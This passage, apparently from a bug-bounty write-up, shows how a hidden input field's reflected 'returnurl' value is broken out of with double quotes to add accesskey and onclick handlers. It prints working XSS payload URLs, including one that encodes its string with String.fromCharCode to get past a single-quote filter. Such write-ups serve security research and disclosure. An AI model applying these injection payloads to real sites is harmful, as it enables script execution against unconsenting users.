…where you have the input sanitized for ‘<> chars.
I come across a web application on a bounty program where the returnurl was placed in the following HTML:
<input type="hidden" name="returnurl" value="[USER INJECT]" />
The security filter removed <>’ chars but kept the double quote active and reflected.
What’s the first thing that comes to mind?
Also you can’t style it to show the field.
http://victim/?returnurl=" accesskey="X" onclick="alert(document.domain)
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
To give a better report and also to bypass their single quote I also sent the following XSS vector:
http://victim/?returnurl=" accesskey="X" onclick="alert(String.fromCharCode(39,89,111,117,32,103,111,116,32,88,83,83,101,100,33,39))
It requires more user interaction but might give the bug appreciation program the Woooo! Factor 🙂